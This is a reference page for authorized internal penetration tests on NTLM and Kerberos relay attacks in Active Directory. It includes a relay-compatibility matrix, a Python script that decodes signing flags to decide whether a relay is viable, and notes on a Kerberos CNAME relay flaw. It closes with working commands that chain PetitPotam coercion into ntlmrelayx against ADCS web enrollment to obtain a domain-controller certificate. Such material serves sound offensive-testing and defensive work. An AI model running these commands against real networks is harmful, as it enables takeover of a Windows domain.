A comprehensive reference for NTLM relay attacks during authorized internal penetration tests. Covers authentication fundamentals, coercion techniques, per-protocol relay targets, tooling, advanced chaining, and defensive mitigations.
- A Linux attack host (Kali, Parrot, or similar)
- Python 3.10+ with Impacket installed
- Network access to the target environment (authorized engagement)
- Basic understanding of Active Directory and Windows networking
- NTLM Authentication & Relay Theory — How NTLM works, why relaying is possible, NTLMv1 vs v2, signing, EPA
- Kerberos Authentication & Relay Theory — AS/TGS/AP exchange, SPN canonicalization, why Kerberos is still relayable
- Identifying Relay Opportunities — Enumeration, finding hosts without signing, mapping attack surface
- Coercion Overview — Forcing machines to authenticate to your listener
- PetitPotam (MS-EFSRPC)
- PrinterBug / SpoolSample (MS-RPRN)
- DFSCoerce (MS-DFSNM)
- ShadowCoerce (MS-FSRVP)
- SMB Relay — Relay to SMB for code execution
- LDAP / LDAPS Relay — Delegate access, create machine accounts, RBCD
- MSSQL Relay — Relay to SQL Server for command execution
- HTTP / WebDAV Relay — Relay to web endpoints, WebDAV coercion
- ADCS Attacks (ESC1–ESC15) — All ADCS escalation techniques including relay
- SMTP / IMAP Relay — Relay to Exchange/mail services
- RPC / DCOM Relay — Relay to RPC endpoints
- SOCKS Proxy Relay — Maintain persistent relay sessions via SOCKS
- Responder — Poisoning and capturing hashes
- ntlmrelayx.py — The primary relay framework
- mitm6 — IPv6 DNS takeover for coercion
- Certipy — ADCS enumeration and relay
- Coercer — Automated coercion tool
- krbrelayx — Kerberos relay and delegation abuse
- Cross-Protocol Relay — Relay from one protocol to another
- IPv6 Attack Chains — mitm6 + relay combos
- Relay Chaining & Pivoting — Multi-hop relay scenarios
- WebDAV Coercion Trick — Forcing HTTP auth from machines
- Kerberos Relay via DNS CNAME Abuse — Cymulate / CVE-2026-20929, Kerberos TGS relay via CNAME poisoning
- Mitigations — SMB signing, LDAP signing, EPA, disabling NTLM
- Detection — Log sources, Sigma rules, behavioral indicators
Applies to classic NTLM relay on modern (post-CVE-2019-1040) patched environments. For the more detailed cross-protocol breakdown, see Cross-Protocol Relay.
| Source Auth | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS |
|---|---|---|---|---|---|---|
| SMB | ✅* | ❌† | ✅ | ✅ | ✅‡ | ✅ |
| HTTP | ✅* | ✅ | ✅ | ✅ | ✅‡ | ✅ |
| WebDAV | ✅* | ✅ | ✅ | ✅ | ✅‡ | ✅ |
| MSSQL | ✅* | ✅ | ✅ | ✅ | ✅‡ | ✅ |

\* Target must not require SMB signing.

† SMB clients set NTLMSSP_NEGOTIATE_SIGN and NTLMSSP_NEGOTIATE_ALWAYS_SIGN in the NEGOTIATE message, and since the CVE-2019-1040 (MIC) fix the relay can no longer strip those flags. A DC with the default LDAP signing policy (negotiated) honours them and demands a signed session, which the relay cannot produce because it never holds the session key. This is why HTTP/WebDAV-sourced auth (whose clients do not request signing) is preferred for LDAP relay.

‡ The ADCS web enrollment endpoint is plain HTTP and does not enforce the NTLM signing flags, so SMB-sourced auth relays to it (the classic PetitPotam → ESC8 chain). What blocks it is Extended Protection for Authentication (channel binding) on the /certsrv/ virtual directory.
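The two preconditions behind the * and † footnotes can be checked directly on the wire. The following is an added example (not code from the original page): it decodes the NegotiateFlags of an NTLMSSP NEGOTIATE (Type 1) message to see whether the *source* asked for signing, and the SecurityMode of an SMB2 NEGOTIATE response to see whether the *target* requires it. The sample messages are constructed for this example; the flag values are chosen to resemble an SMB client and an HTTP client but are not captured traffic.

```python
"""Decode relay preconditions from NTLM Type 1 and SMB2 NEGOTIATE messages.

Added example, not the page's code. Sample messages below are constructed.
Offsets follow MS-NLMP 2.2.1.1 (NEGOTIATE_MESSAGE), MS-SMB2 2.2.1.2 (header)
and MS-SMB2 2.2.4 (NEGOTIATE response).
"""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_NEGOTIATE_MESSAGE = 1

# Subset of NegotiateFlags (MS-NLMP 2.2.2.5) relevant to relay.
NTLM_FLAGS = {
    0x00000001: "NEGOTIATE_UNICODE",
    0x00000002: "NEGOTIATE_OEM",
    0x00000004: "REQUEST_TARGET",
    0x00000010: "NEGOTIATE_SIGN",
    0x00000020: "NEGOTIATE_SEAL",
    0x00000200: "NEGOTIATE_NTLM",
    0x00008000: "NEGOTIATE_ALWAYS_SIGN",
    0x00080000: "NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x02000000: "NEGOTIATE_VERSION",
    0x20000000: "NEGOTIATE_128",
    0x40000000: "NEGOTIATE_KEY_EXCH",
    0x80000000: "NEGOTIATE_56",
}
NTLM_SIGN_FLAGS = 0x00000010 | 0x00008000          # SIGN | ALWAYS_SIGN

SMB2_SIGNING_ENABLED = 0x0001                       # SecurityMode bits
SMB2_SIGNING_REQUIRED = 0x0002


def build_ntlm_negotiate(flags: int) -> bytes:
    """Minimal Type 1 message with empty Domain/Workstation fields (constructed)."""
    return (NTLMSSP_SIGNATURE
            + struct.pack("<II", NTLM_NEGOTIATE_MESSAGE, flags)
            + b"\x00" * 8     # DomainNameFields: Len, MaxLen, Offset
            + b"\x00" * 8)    # WorkstationFields: Len, MaxLen, Offset


def build_smb2_negotiate_response(security_mode: int) -> bytes:
    """SMB2 header (64 bytes) + NEGOTIATE response body (64 bytes), constructed."""
    header = (b"\xfeSMB"
              + struct.pack("<HHIHHI", 64, 0, 0, 0x0000, 1, 0x0001)  # Command=NEGOTIATE, Flags=SERVER_TO_REDIR
              + b"\x00" * 44)
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, security_mode, 0x0311, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 0, 0, 0)
    return header + body


def ntlm_negotiate_flags(msg: bytes) -> int:
    """Return NegotiateFlags from a Type 1 message, validating signature and type."""
    if msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type, flags = struct.unpack_from("<II", msg, 8)
    if msg_type != NTLM_NEGOTIATE_MESSAGE:
        raise ValueError(f"expected NEGOTIATE_MESSAGE, got type {msg_type}")
    return flags


def ntlm_flag_names(flags: int) -> list[str]:
    return [name for bit, name in sorted(NTLM_FLAGS.items()) if flags & bit]


def source_requests_signing(type1: bytes) -> bool:
    """True if the client asked for signing; these bits are MIC-protected post-CVE-2019-1040."""
    return bool(ntlm_negotiate_flags(type1) & NTLM_SIGN_FLAGS)


def smb2_security_mode(packet: bytes) -> int:
    """SecurityMode from an SMB2 NEGOTIATE response (header + body)."""
    if packet[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 packet")
    if struct.unpack_from("<H", packet, 12)[0] != 0x0000:
        raise ValueError("not a NEGOTIATE response")
    struct_size, security_mode = struct.unpack_from("<HH", packet, 64)
    if struct_size != 65:
        raise ValueError("bad NEGOTIATE response StructureSize")
    return security_mode


def target_requires_signing(negotiate_response: bytes) -> bool:
    return bool(smb2_security_mode(negotiate_response) & SMB2_SIGNING_REQUIRED)


def smb_relay_viable(negotiate_response: bytes) -> bool:
    """SMB -> SMB: only the target's policy matters (footnote *)."""
    return not target_requires_signing(negotiate_response)


def ldap_relay_viable(type1: bytes, ldap_signing_required: bool = False) -> bool:
    """-> LDAP: fails if the DC requires signing, or if it merely negotiates
    signing and the source asked for it (footnote †)."""
    if ldap_signing_required:
        return False
    return not source_requests_signing(type1)


# Constructed samples: an SMB-style Type 1 (SIGN | ALWAYS_SIGN set) and an
# HTTP/WebDAV-style Type 1 (no signing bits); two SMB2 servers.
SMB_CLIENT_TYPE1 = build_ntlm_negotiate(0xE2088297)
HTTP_CLIENT_TYPE1 = build_ntlm_negotiate(0xE2080207)
SERVER_SIGNING_OPTIONAL = build_smb2_negotiate_response(SMB2_SIGNING_ENABLED)
SERVER_SIGNING_REQUIRED = build_smb2_negotiate_response(SMB2_SIGNING_ENABLED | SMB2_SIGNING_REQUIRED)

if __name__ == "__main__":
    for label, t1 in (("SMB client", SMB_CLIENT_TYPE1), ("HTTP client", HTTP_CLIENT_TYPE1)):
        print(f"{label}: {ntlm_flag_names(ntlm_negotiate_flags(t1))} -> LDAP relay viable: {ldap_relay_viable(t1)}")
    for label, resp in (("signing optional", SERVER_SIGNING_OPTIONAL), ("signing required", SERVER_SIGNING_REQUIRED)):
        print(f"SMB target ({label}): SMB relay viable: {smb_relay_viable(resp)}")
```

In practice `ntlm_negotiate_flags` is applied to the base64-decoded `NTLM` token from an HTTP `Authorization` header or to the NTLMSSP blob inside an SMB2 SESSION_SETUP, and `smb2_security_mode` to the first response a target returns after the protocol negotiation; tooling such as NetExec's `--gen-relay-list` does the SMB2 side for you, but the bit being tested is the same.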
The Cymulate / CVE-2026-20929 primitive (Jan 2026): the attacker poisons DNS with a CNAME, Windows canonicalizes the SPN to the CNAME target, the client requests a TGS for the attacker's chosen target, and the resulting AP-REQ is relayed. Because many services accept a ticket based only on the host portion of the SPN (any SPN encrypted with the target's key works), the service class of the coerced request matters far less than in NTLM relay; what gates the attack is whether the target service enforces its own anti-relay control (signing or channel binding).
| Target service | Relayable unless... | Patch / status |
|---|---|---|
| SMB | SMB signing is required on the target | — |
| LDAP | LDAP signing is required | — |
| LDAPS | LdapEnforceChannelBinding = 2 (Always) | — |
| HTTP / IIS | HTTP CBT enforced (HTTP.sys token checking = Require) | CVE-2026-20929 backports HTTP.sys CBT |
| ADCS /certsrv/ | Extended Protection = Require on the vdir | HTTP.sys CBT via CVE-2026-20929 applies |
| MSSQL | Extended Protection enabled | — |
| Exchange (OWA/ECP/…) | EPA on all virtual directories | — |
All rows assume the attacker has the network position to poison DNS (DHCPv6 via mitm6, ARP spoofing, or a rogue DHCPv4 server). Full technique: Kerberos Relay via DNS CNAME Abuse.
- Enumerate — Find hosts with signing disabled and identify coercion targets
- Position — Start your relay listener (ntlmrelayx) pointing at your target
- Coerce — Trigger authentication from a source machine to your listener
- Profit — Relay captures and forwards the auth to your target protocol
```bash
# Classic example: coerce the DC, relay its machine auth to ADCS web enrollment
# (ESC8) and request a certificate on the DomainController template.

# Terminal 1: relay listener. -smb2support accepts SMB2 coercion traffic;
# --adcs relays to the certsrv endpoint and writes the issued certificate out.
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: trigger MS-EFSRPC coercion from the DC to the listener.
# Since CVE-2021-36942 the unauthenticated path is blocked on patched DCs,
# so supply any domain credentials with -u/-p/-d.
python3 PetitPotam.py ATTACKER_IP DC_IP
```